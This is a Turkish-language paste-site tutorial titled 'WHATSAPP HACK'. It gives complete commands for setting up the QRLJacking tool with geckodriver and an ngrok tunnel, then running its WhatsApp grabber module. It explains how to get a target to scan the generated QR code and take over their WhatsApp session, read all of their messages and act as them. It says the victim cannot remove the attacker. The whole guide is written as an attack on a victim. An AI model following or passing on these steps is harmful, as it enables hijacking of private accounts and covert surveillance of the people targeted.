JustPaste.it

WHATSAPP HACK

Masaüstüne Geliyoruz

cd Desktop

Kullanacağımız Toolu İndiriyoruz

git clone https://github.com/OWASP/QRLJacking

geckodriver'a ihtiyacımız var https://github.com/mozilla/geckodriver/releases bu adrese gidip linux sürümünüze uygun olanı indirin

zip dosyasını çıkartın ve driveri gereken dizinlere kopyalayın

sudo cp geckodriver /usr/local/share/

sudo cp geckodriver /usr/local/bin/

sudo cp geckodriver /usr/bin/


şimdi terminali kapatabilirsiniz.

aracı dış ağda kullanmak için ngrok'a ihtiyacımız var sitesine girin kayıt olun ve indirin https://ngrok.com/

ardından zipten çıkartın ve

sudo mv ngrok /root

dizinine atıp root dizinine giriş yapıp yetki verin

chmod +x ngrok

son olarak

cp ngrok /usr/bin/

buraya kopyalayıp işlemi bitiriyoruz

kayıt olduğunuzda size bir key verdi o keyi tanıtmak için

./ngrok authtoken tokeni yazın

masaüstüne geliyoruz

cd QRLJacking/

gerekli pyhton modüllerini yüklüyoruz

pip3 install -r requirements.txt

pip3 yüklü değil ise şu komutu girin sudo apt-get install python3-pip

toolu çalıştırıyoruz

python3 QrlJacker.py

help yazarak komutları görebilirsiniz

exploiti çalıştıralım

use grabber/whatsapp

options komutunu girerek ayarlara girelim

portu ve hostu ayarlayacağız

set port 1337
set host 0.0.0.0
not: firewall kuruluysa 1337 portuna izin verin

başka bir terminal açıp portu dinlemeye alıyoruz

ngrok http 1337

QRLJacker'ın olduğu terminale gelerek

run

komutunu verdiğinizde qr kod oluşacak
ngrok'u dinlemeye aldığınız terminale gelin forward url'nin karşısındaki urlyi açın
bu kodu hedef telefona okutacaksınız
bu kodu okuttuktan sonra whatsapp kontrolü tamamen sizde olacak karşı tarafın. fark etse bile sizi atamayacak.

kodu okuttuktan sonra

sessions -i 0

kodunu girerek tarayıcıda açılan sekmeyle tüm mesajları görebilir hedefin whatsapp'ında her şeyi yapabilirsiniz.